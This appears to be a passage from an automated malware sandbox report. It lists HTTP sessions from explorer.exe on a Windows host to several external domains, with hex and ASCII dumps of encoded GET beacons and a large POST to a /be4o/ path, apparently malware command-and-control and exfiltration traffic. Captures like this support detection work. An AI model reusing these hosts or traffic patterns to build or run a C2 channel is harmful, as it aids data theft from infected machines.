                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.553648949 CET10392OUTData Raw: 42 32 79 67 61 59 47 28 33 52 58 31 45 56 62 6b 49 70 5f 6a 61 54 48 47 67 58 50 32 75 4e 48 64 53 4c 2d 62 34 66 54 44 58 55 55 37 71 7a 34 30 65 39 5f 71 31 65 73 33 43 70 63 78 6b 73 54 6a 74 59 79 6b 43 48 51 33 72 47 5a 59 34 38 65 72 6d 49
                                                                                                                                                                                                                              Data Ascii: B2ygaYG(3RX1EVbkIp_jaTHGgXP2uNHdSL-b4fTDXUU7qz40e9_q1es3CpcxksTjtYykCHQ3rGZY48ermIlRvmykJTijRg5qiZiXuQfLRiWBC40a3oMP5YSKndr(k(MCLX6HmtBSALOsDADpX6_Y9oih-NPMvNW3u22QgJ5QiJPMC2R0hBQ5EKaimbPy7Sp(HPnXZjwJ0Qfv-jpEpa0g5m4VfStX-BVji72BqkOcm(FnsvC4os-
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567190886 CET10393INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:18 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://waktuk.com/be4o/
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567300081 CET10394OUTData Raw: 33 76 4a 59 39 56 4c 66 38 6c 6a 41 6b 6c 4e 5a 4f 35 78 4d 53 67 7a 30 73 33 54 44 4c 58 31 7a 48 51 38 6e 61 77 39 6a 62 32 71 49 69 4c 6f 4e 6a 4d 59 4f 48 6f 72 73 47 56 4a 51 35 54 72 5a 4a 55 62 34 59 67 78 34 76 48 44 65 33 28 47 79 4f 31
                                                                                                                                                                                                                              Data Ascii: 3vJY9VLf8ljAklNZO5xMSgz0s3TDLX1zHQ8naw9jb2qIiLoNjMYOHorsGVJQ5TrZJUb4Ygx4vHDe3(GyO1xGwtCmCnDqGAMlq3LQh(2xaWhBUBVghQo0VxjlMUafdOExMJqDYxKnEVQimY1B98sKMbI2YL0G77iZqWFzzimYl2tgs(UakKkohHjpdUPQ3v8mc00oq4CPy3RPkF-olgRTsJIaOHTg4O0~oSfbHv_XrcXAR0VIxcv
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.567347050 CET10395OUTData Raw: 34 4a 6f 6f 5f 4a 41 52 34 51 57 54 45 28 41 34 5f 62 69 48 5f 51 47 37 30 4e 54 73 44 28 78 6d 51 7e 4b 43 48 37 48 62 64 63 5f 46 6a 61 66 33 33 64 4e 68 36 34 78 52 6d 66 6b 73 31 55 78 55 76 33 6f 67 5f 79 78 54 78 59 4b 49 74 79 7a 4a 54 69
                                                                                                                                                                                                                              Data Ascii: 4Joo_JAR4QWTE(A4_biH_QG70NTsD(xmQ~KCH7Hbdc_Fjaf33dNh64xRmfks1UxUv3og_yxTxYKItyzJTiJjE59JlDUxLh2yTBvqZJcqOhS7RWnWF7M~g2m9mLGV6PCMt85KB0WTEBao9VPZqWIyBZF4neNcBpRxuNS7zALDjwhbgU8xrxcUM12IFGsVda9NTVY(x1KyC5CyfCx64YlNGOV(KFNRAndy3eXq-USE6ytKMCDN_Xy


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              39192.168.11.204983695.179.246.12580C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.565838099 CET10392OUTGET /be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu HTTP/1.1
                                                                                                                                                                                                                              Host: www.waktuk.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:18.577024937 CET10396INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:18 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              4192.168.11.204977979.110.48.18880C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:51:29.980031013 CET8953OUTGET /be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.neonewway.club
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:51:30.154654980 CET8954INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:51:30 GMT
                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Content-Length: 203
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 65 34 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /be4o/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              40192.168.11.204983966.29.154.15780C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.744302988 CET10428OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.buresdx.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.buresdx.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.buresdx.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 4e 44 68 47 6e 43 51 6e 68 32 71 75 41 56 31 73 62 44 36 58 32 46 6a 71 5a 77 61 37 31 78 59 7a 4f 5f 31 49 52 62 77 49 63 36 77 35 4b 43 58 6f 58 4e 43 36 4a 66 43 5f 76 49 6f 64 47 78 6b 53 6a 4f 53 46 49 45 45 69 7a 39 32 6f 76 35 63 68 33 39 6e 50 4b 49 59 48 4c 37 38 33 39 43 58 39 49 30 32 62 34 35 4f 76 39 76 4c 55 6d 4d 69 42 6d 69 71 41 68 2d 6d 74 77 74 30 64 79 45 39 33 71 32 61 34 79 45 33 7a 69 64 59 72 6d 75 28 62 69 61 6b 39 6f 75 71 62 4e 47 30 53 68 4a 72 4f 52 5a 43 33 68 6a 56 64 37 37 32 62 33 34 6a 42 72 33 4a 57 53 35 4d 77 7a 35 31 67 78 6d 63 67 4c 2d 55 70 63 48 6e 55 7a 44 68 43 55 35 47 70 32 71 67 4d 4d 2d 6d 67 41 52 5a 65 31 4b 68 41 39 51 4c 4b 4e 43 6f 6b 76 45 53 6c 6e 48 38 43 56 53 78 6c 56 6d 75 41 63 75 67 46 62 38 35 74 32 43 55 79 4c 77 52 6c 7e 62 51 72 31 43 52 4a 31 69 75 4b 35 4d 43 32 33 46 6c 58 6b 50 53 59 6b 53 7a 62 70 30 38 64 36 37 57 39 38 35 28 4f 4f 76 56 61 7e 44 58 75 4f 7a 61 65 30 63 6f 65 66 69 28 6c 45 2d 6d 63 47 41 34 35 4d 4a 64 66 53 70 56 30 73 4f 6d 56 5a 78 33 4c 28 6d 57 7a 6e 6d 64 71 72 35 58 71 4c 79 54 54 6f 66 54 46 58 32 70 5a 61 4d 53 68 6f 51 55 33 54 4c 56 37 45 4c 50 55 78 70 4a 7a 59 6e 4e 66 38 33 79 77 48 69 51 34 68 4c 71 39 71 4a 65 63 79 44 62 68 74 6d 30 53 61 45 5a 39 4a 62 6b 38 75 33 34 43 67 56 61 66 74 46 69 34 71 4f 64 47 7a 50 4e 36 33 53 58 6a 30 63 30 46 75 39 31 77 36 68 6c 33 34 38 32 79 74 35 54 73 73 67 75 4e 68 37 5a 6c 39 33 6d 45 70 6a 52 31 57 55 6d 45 42 77 39 42 62 2d 6d 62 4e 42 4f 75 54 41 73 56 43 75 77 4f 7e 4f 4f 32 28 4a 59 6f 47 79 32 64 32 4a 34 65 6b 67 71 36 75 6e 6f 77 35 67 41 6c 50 37 75 74 54 34 4c 62 37 44 49 70 6b 78 39 42 42 44 55 49 46 31 56 65 69 38 50 4c 36 4f 35 50 64 6e 6f 4b 36 69 31 62 65 4d 42 42 6b 39 63 31 71 58 6f 34 49 5f 4f 56 7a 77 4a 6e 66 46 57 4e 32 37 46 7a 51 49 6d 38 62 70 4f 39 7a 6e 69 71 30 49 69 42 39 41 32 67 66 72 36 6c 72 5f 4f 36 30 69 55 6f 47 57 6c 43 36 49 65 78 65 53 53 78 68 2d 50 32 72 38 69 6b 78 73 6a 7a 42 4d 7e 34 4d 56 70 6a 28 67 7e 49 4d 2d 54 33 45 63 30 78 4b 48 61 56 59 78 4f 66 71 68 46 66 41 6d 4b 36 6b 51 28 5f 35 6c 52 68 59 61 69 76 77 57 4b 5a 71 6e 52 67 49 33 41 4c 48 37 49 74 66 4c 72 6e 53 49 36 33 4a 4d 77 37 73 65 54 4e 35 61 72 55 65 6a 30 48 77 67 63 57 51 41 75 42 6c 77 31 45 55 6c 4e 4e 42 6c 39 76 4b 76 77 76 66 76 79 78 56 4d 4e 62 4f 2d 6d 63 6b 7a 41 4c 73 63 58 49 53 31 41 33 77 48 7a 64 33 58 49 76 74 31 52 64 44 6c 43 53 42 76 4e 74 46 42 34 7a 45 36 49 67 72 79 65 64 32 4d 42 58 65 6c 50 33 57 54 62 35 6d 59 69 65 67 59 77 57 64 47 67 33 35 41 49 68 74 4d 55 35 76 2d 43 61 45 46 6f 74 79 43 7a 30 67 51 45 53 67 65 7e 66 76 44 79 54 4b 62 6b 77 7e 76 55 6a 6b 4b 7a 63 4d 31 55 46 54 46 41 58 73 62 31 5a 65 76 35 68 72 51 4d 7a 71 5f 76 76 5a 49 39 4a 7a 4c 32 64 52 41 39 5a 78 68 6d 7a 47 64 7e 6b 47 47 51 5f 61 56 6d 4c 71 30 66 39 48 34 56 49 45 66 4e 45 4c 62 58 5f 4b 43 6b 6b 59 51 58 69 73 57 4d 76 33 4f 78 6d 28 64 74 35 6f 48 59 38 38 5a 50 35 42 56 4c 76 5a 45 43 56 43 38 4a 49 39 38 37 77 6b 7a 34 4b 74 77 57 53 63 75 66 66 79 59 4e 57 4a 57 75 73 48 71 51 5f 7e 4b 4c 53 50 6b 4b 57 4b 6c 39 4f 4c 4a 74 50 62 56 68 4b 46 76 57 66 49 37 37 6a 51 4e 78 59 50 39 6a 63 59 6e 77 72 4c 6f 28 73 72 47 30 54 33 32 55 70 28 64 62 53 72 63 48 2d 46 66 56 2d 76 72 4e 47 42 30 55 73 70 69 5a 48 6c 70 56 4d 48 66 76 37 66 62 63 45 46 4a 6f 34 53 68 34 47 44 41 4c 52 42 35 47 2d 6e 65 43 68 6a 72 45 4b 68 73 57 6b 59 4e 76 49 7e 46 50 2d 5a 74 6e 32 45 52 61 34 61 68 37 4d 42 51 45 52 28 61 51 70 5a 57 6e 53 33 6b 38 65 6a 6d 4b 6a 45 49 54 78 44 6c 7a 36 5a 56 6a 42 28 39 78 58 6d 54 6a 63 32 32 6d 62 65 58 65 58 6d 47 49 52 30 6d 61 76 6c 78 7e 6b 41 6c 4c 51 37 33 30 49 78 78 6f 38 53 33 4c 35 57 6f 67 34 56 63 33 54 4b 4d 49 6b 4f 4f 75 62 6c 35 68 49 4d 57 7e 6d 48 41 49 59 39 4a 66 70 30 4c 35 6e 4d 67 70 4a 45 42 6b 77 48 5a 6a 59 28 37 71 64 64 33 39 76 52 5a 67 5a 6c 75 5a 73 35 4c 79 30 42 39 57 30 5a 67 4e 4a 47 78 7e 6c 33 38 44 67 69 6b 32 56 43 6a 56 33 44 58 6a 74 43 66 62 70 79 6a 58 63 71 35 4b 31 68
                                                                                                                                                                                                                              Data Ascii: h48Hl=NDhGnCQnh2quAV1sbD6X2FjqZwa71xYzO_1IRbwIc6w5KCXoXNC6JfC_vIodGxkSjOSFIEEiz92ov5ch39nPKIYHL7839CX9I02b45Ov9vLUmMiBmiqAh-mtwt0dyE93q2a4yE3zidYrmu(biak9ouqbNG0ShJrORZC3hjVd772b34jBr3JWS5Mwz51gxmcgL-UpcHnUzDhCU5Gp2qgMM-mgARZe1KhA9QLKNCokvESlnH8CVSxlVmuAcugFb85t2CUyLwRl~bQr1CRJ1iuK5MC23FlXkPSYkSzbp08d67W985(OOvVa~DXuOzae0coefi(lE-mcGA45MJdfSpV0sOmVZx3L(mWznmdqr5XqLyTTofTFX2pZaMShoQU3TLV7ELPUxpJzYnNf83ywHiQ4hLq9qJecyDbhtm0SaEZ9Jbk8u34CgVaftFi4qOdGzPN63SXj0c0Fu91w6hl3482yt5TssguNh7Zl93mEpjR1WUmEBw9Bb-mbNBOuTAsVCuwO~OO2(JYoGy2d2J4ekgq6unow5gAlP7utT4Lb7DIpkx9BBDUIF1Vei8PL6O5PdnoK6i1beMBBk9c1qXo4I_OVzwJnfFWN27FzQIm8bpO9zniq0IiB9A2gfr6lr_O60iUoGWlC6IexeSSxh-P2r8ikxsjzBM~4MVpj(g~IM-T3Ec0xKHaVYxOfqhFfAmK6kQ(_5lRhYaivwWKZqnRgI3ALH7ItfLrnSI63JMw7seTN5arUej0HwgcWQAuBlw1EUlNNBl9vKvwvfvyxVMNbO-mckzALscXIS1A3wHzd3XIvt1RdDlCSBvNtFB4zE6Igryed2MBXelP3WTb5mYiegYwWdGg35AIhtMU5v-CaEFotyCz0gQESge~fvDyTKbkw~vUjkKzcM1UFTFAXsb1Zev5hrQMzq_vvZI9JzL2dRA9ZxhmzGd~kGGQ_aVmLq0f9H4VIEfNELbX_KCkkYQXisWMv3Oxm(dt5oHY88ZP5BVLvZECVC8JI987wkz4KtwWScuffyYNWJWusHqQ_~KLSPkKWKl9OLJtPbVhKFvWfI77jQNxYP9jcYnwrLo(srG0T32Up(dbSrcH-FfV-vrNGB0UspiZHlpVMHfv7fbcEFJo4Sh4GDALRB5G-neChjrEKhsWkYNvI~FP-Ztn2ERa4ah7MBQER(aQpZWnS3k8ejmKjEITxDlz6ZVjB(9xXmTjc22mbeXeXmGIR0mavlx~kAlLQ730Ixxo8S3L5Wog4Vc3TKMIkOOubl5hIMW~mHAIY9Jfp0L5nMgpJEBkwHZjY(7qdd39vRZgZluZs5Ly0B9W0ZgNJGx~l38Dgik2VCjV3DXjtCfbpyjXcq5K1hFviM5dEowbrKg9JEwCnxS5So8qduyuZrhGCp0h9KADLJ_pxAjLQ0TqPiQ(B36h3Nc9uJJ6_Yb9ZNg3sJJHfHM8uJQPHHrcJpFvzA3ypAvZ7dsffP1zVYKVWNTqOelRvoRy2cFuIjnjtXuXEyTsZvPPD2u(7Otm-m4n-xvmSxTfR8Dka3964ODV2oJEh2J2p0lw2spTnc4dm7c8a8Hkr7QQMdEuM68obmuXy4vJlMSqJwdxmN0WZ~Fe3foCjqo69~DGHpUPfr73XdiCUcbyZleMTEtH7gorwuTlP(ZLhBGw00WFwlYbDYgdeiJatlilXosPGZ_abrrblp5~cJ72cWeWnvF0RqIup39kwEcI9wOej9399Fio8Jv2R6CYqNPH8NClPWFAAFVH6xm(_d4ZmiU0-WxZuSNdm1eW8y5LUtktZ2SIdy_NYVbPF23UWVSZbu8N6Ni(1gimIA7xUFfsc8122uWeEapftNsjv2yy3f4FfQvVNEnKThbmKcpoepEZtMSDMHQxZM-bg1z(rk6DK5p0uK1dA~uoRp0w6FFfSrQhnrKKErkq80GqAfJvjOIjZ(8N5OmYWZ_BtmNGQz0nlDqhG8D5ALE6O3wxVwxee92TfdOiKaA5X(8Jw(GMmgbkgfggQE_3zdLQcMRJzCef8nCm1FOUzHOoIk6VgvFzhSQpytSBqyDlKP9rwb3GbZ-cKxRFMLbaHHan6ZC5rilBwLgFdX-9leJu1ELd2DcUVTqcUsjNIOdqyAoVsR95OW62TfNy8dgICw-mWZeuhEtdGCO1ONdPZrXWpSVII(uYdafFPDR~MAmBWID9M76MX1aHz5Fi6Ds3NEunUClV26hwTPEHe3iKGX0G2TxzjAqMtFCo1if464I(r4lzMce8Ruj5ue5hqTY~4OyHuGRAEgnVO7j467V9MjEeRpd(4wM6V7n~j6AbF9Xn73u5Iqo2GWK1CVhN9QTGG5K1aijPIfSKCevANRwBI(XVfMFbvWGgJ~c3UqdpTIl36eCwjnMw7vphk36tiluFH1TYNB72F2Tx8aOdh8uk7vGkEzBCGWdtbxsovg-ea74nMIwZ0UAPP3G91v8kQ8ib-gjPhAzQVrhzZdH(yBJPbWmMr3h(9FPr4Bra5Oo~poWbYKrYF3_PsYedWu2WCFWC3SVF8zwU8e_xmGN17PxDLWGWWdpUr1cCBOxaAmmeHoteRCO(FDUyqrp(ZDYjn2PrqTW2BlEluzDYUOgssBqyoK6H2rt11gn4RUF7BrSrbartcld5GVN2EgM~iC-dfLPJmTvQuBaJcee~W2TA2BoPX5FycdvfchuS7lN3sruQv(BDQE9tPZ_kO~kUf(ADjgwa5zBJZYBzUih271ioXi79Yc0qzLRk8iu7lYUtFt1tB3YXRMiTEUMrCOn4tWB2DN98v9o8XLMqRe5Mk~roX19Rc6Su_glTb81gkIQUJc8Kr4Klv5ZbTnP2HkxWg3g6o(BvtTidqD0saFbFRVivNboc2t5FABglCAUSZCbOEFbMg0adIQ9u5IsblzgEQQ_GLoRkh88No~5LPZ_iXire9k0NmwWUBlp8Nj6~EkEUu9gQ82nOJrbox9fuZXaKUnVR78FebLGgRoGgRbhvmIZC23IkikOvE5fJI~Q2pDtlalb7lzgsmTil-zoIPglfRo483Cmr2ykBftz0gOjAAhLBsAYjZpCRyk27oGvjmmGnkDwj9QLNLGMlfsERON8oNgU~zLYYvD-JD~LpybHWAbq~cJGcyktDZjrxSVEpLDzT0y1c18f1f(9~40kIaBlCQeEeJwZc1BB0wlCLvdbVUD31Xwk4VL-ggYRwjwMajdOWMnfwL62P0zy3kx-rHRqFsES(L7goOPrV8q1aU67SmfwAmvhAcV_m5vEYj2TtKVBXmiMy2hAGgRtAifnVkFVTjwWcU4dIe9mEZRRpXBOQDF-xDyDuiPbjP2Ym-On5oq-XGEcZNe4JGvSqDfBA3tMPkfgW0cHYzwWwr6teuRm77Xo~LlEhnS5xMYIGnw6GDa3VVZw(5dSXP7RCHfy9qIm~Uh6Vrk2ylZ9ra7v82Qq3_6YyrLz4GnicCZuj72tijktLUTWmTdX5UPBEUxXoQw6uTzIu0hlv5TnQtzBRfI5YFPc(ifr7PhHVRYj2fkW6EHGibxCrJutzNthqsywtLR0FCceKUJcdqwgtu9N1y7sNTXqkdW3wBxtFXhxXMamtGhuLBLjBIPzx4CYvdmG(crwQRKwvt8SOFBTypFPHghwfirRrayUWMBzRYIbVc9hN-YtbSJ_p2D-5NbxFg~GOz2zrnD5ux7GNQ0SUFsEVIeLvVU_2ZGaOmhbo_UVW4ZEfjNdvMRR99Wd4whd7NDzSQsMRXHCWR0TS6ydgdjKtsg0eRbPh-rQJnod16FonLXQvTWfUUTJBUPeRiMpSe5N92ZbDkcPW83zWwWOvX6aHDJFHchrdsNijnNeavTiJhkQXYMfMYwUFd6Kkn8DJT1ve-UdAADp4TIxzK66J9uGF5hNdzXi12mkadJg14Rwur8wP_LyKxac0lj60E2xrOfd8AMn5pkaYsYlB6ugy8SviaPrjujVP744CfvrTw6MlktqqiqKbzlapjQIcUSFvsqQHYIpdy0VAwWU6FdqcWfq0yGJw1geb1HpSVw7SWiVHcGmuc4NEOwUaLHe3KbqBloPLL6QcGqEwCC3qdZvQYY0gQ5WOTlicRiduEnifUz7hh
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.744411945 CET10435OUTData Raw: 4a 58 46 6d 54 35 4a 70 6a 51 6c 6b 54 66 34 77 42 5a 65 37 68 4b 6c 64 37 69 42 4d 53 55 53 52 6e 50 6d 31 6a 6a 78 6a 42 74 6f 66 54 65 65 32 36 30 46 30 48 4c 7a 69 4f 58 53 4c 4e 73 52 72 79 65 58 41 44 75 32 74 42 36 64 4d 63 74 5a 6b 49 56
                                                                                                                                                                                                                              Data Ascii: JXFmT5JpjQlkTf4wBZe7hKld7iBMSUSRnPm1jjxjBtofTee260F0HLziOXSLNsRryeXADu2tB6dMctZkIVCrrR1mZ14qwX4vnAGOt-xKgvE567VpyExYro86a-5gWSR6kPudztDXUmUtsEVw7B6T8Ds4WAOry19iHBgsLnjrv1gz0Gyu7AdUiR(l21dbKkEUdmha7iWzISOqvB9UvXCMrwDY9_Tlx5iacUxtAEymGI5eeb2qA8B
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.901828051 CET10438OUTData Raw: 63 36 53 33 49 30 55 69 5a 6f 37 79 68 32 33 34 67 49 44 75 78 41 7a 6e 53 58 46 33 68 65 28 6d 55 34 75 53 57 72 42 56 6a 76 34 46 33 31 69 6c 44 79 53 6d 55 4e 34 72 52 68 44 75 6c 79 31 77 7e 63 4c 46 47 32 46 35 50 42 71 6e 31 6f 58 69 68 46
                                                                                                                                                                                                                              Data Ascii: c6S3I0UiZo7yh234gIDuxAznSXF3he(mU4uSWrBVjv4F31ilDySmUN4rRhDuly1w~cLFG2F5PBqn1oXihF5AWc1UCTeYrXA5bogqPCFk88s0rLj_xeyLgo2bUvJGAp0cuoo9Sghu86YkWyQc84M9v6EZ7Lv13_RAqS71AHPj1u825I0kKCoR4kOSMRX7a0u3CH532ciCES3lc44lY6(P39YSTKBsfzy7hsd5VU95sWWwBv8rI_g
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.901964903 CET10448OUTData Raw: 6a 38 72 6e 44 74 71 48 32 78 6b 49 61 43 30 4d 75 76 48 32 4b 47 4e 51 62 34 48 6c 34 78 7a 74 7a 59 78 55 63 68 76 44 42 6c 69 51 59 79 54 6f 28 37 76 42 54 6e 4c 49 69 69 6c 73 77 5a 38 31 76 70 30 33 71 39 39 46 53 4b 71 44 53 66 73 49 76 50
                                                                                                                                                                                                                              Data Ascii: j8rnDtqH2xkIaC0MuvH2KGNQb4Hl4xztzYxUchvDBliQYyTo(7vBTnLIiilswZ81vp03q99FSKqDSfsIvPVzesRytkQs5NBSkysYG0gyDQEVf1JKz7o0WIiLXIO1N9WZcouRjMNBrSC-hGtp9w(I6TyMtroFO2zpf-fwiAW0ziQR8R(APl8SZfJGQLfmdSvPlbd1bMH2zDV-yFuiS6ldS5bYo2jwnQ5qWOSOx4y8qZo299uvuOG
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.902172089 CET10450OUTData Raw: 65 2d 79 74 45 4f 33 30 78 62 65 78 6c 61 74 63 53 4b 6b 30 6a 77 73 77 7a 4a 62 74 37 65 30 38 30 57 37 2d 42 44 45 75 71 69 69 69 45 49 31 61 30 6e 62 79 6e 54 44 78 49 54 64 50 35 58 55 4e 35 54 32 55 57 55 59 50 4c 51 73 6d 62 35 57 6e 62 55
                                                                                                                                                                                                                              Data Ascii: e-ytEO30xbexlatcSKk0jwswzJbt7e080W7-BDEuqiiiEI1a0nbynTDxITdP5XUN5T2UWUYPLQsmb5WnbUllgDVWHaBBFJhP6DvzsqVFxDnwq8VWqrr3nyBCcC~OV1lSQHzuIL9Jg7gtIGnqaWUMy7ICW94g~TmGE9g9(YlDn2lV9nL3RTYYmpQSViqLg-W37adWUP8C4Pk82N~S~jTkD-dqVD4H8w56QLdFdPDXsOkncYYUol~
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.902347088 CET10451OUTData Raw: 32 53 59 36 5a 54 67 64 75 5f 57 61 4b 50 35 51 4a 72 33 71 30 41 39 73 56 39 7e 61 47 6e 6f 5f 59 57 73 55 46 56 7a 68 70 2d 30 47 52 68 34 6e 32 63 75 6b 30 6d 38 73 57 68 4b 6e 7e 6d 4d 63 31 68 55 76 77 34 56 59 34 55 47 6c 50 36 4b 68 76 55
                                                                                                                                                                                                                              Data Ascii: 2SY6ZTgdu_WaKP5QJr3q0A9sV9~aGno_YWsUFVzhp-0GRh4n2cuk0m8sWhKn~mMc1hUvw4VY4UGlP6KhvUfsz8EOka4PlboU5gq0PNjMTHccTfTR(MDIZGRCGUM5EMJxAN1u11NRf0OcTTZPXPhXBmmEYwGJQ9~pts1QkjH1TmhTiIVkYo6lNOXVnFDU3th6QQESRlIOifq5U6Oxyn1PI7HX(xtb3aSyaKcjrqE5YQcDD2LVSC3
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.902920961 CET10454OUTData Raw: 35 33 7a 79 41 57 59 59 6f 37 6d 68 34 6d 4b 76 38 79 35 57 75 4d 4b 48 71 56 6b 4e 4b 61 75 57 78 42 65 72 35 42 63 41 50 57 38 4e 6a 6b 36 4c 48 64 46 73 57 50 34 45 73 51 50 63 67 6b 45 75 64 39 28 75 57 62 56 54 74 41 54 66 33 4f 54 45 6c 74
